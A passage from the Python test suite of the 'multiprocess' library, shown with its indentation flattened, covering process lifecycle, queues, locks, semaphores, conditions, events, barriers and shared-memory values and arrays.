self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
p.terminate()
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("__init__.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
sys.stderr = open(testfn, 'w')
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
sys.stderr = open(testfn, 'w')
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason, code in (([1, 2, 3], 1), ('ignore this', 1)):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, code)
with open(testfn, 'r') as f:
self.assertEqual(f.read().rstrip(), str(reason))
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocess as multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 30 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.170)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
for i in range(10):
try:
if get_value(woken) == 6:
break
except NotImplementedError:
break
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=10))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(10))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 10)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
f(*args)
b.wait_for_finished()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
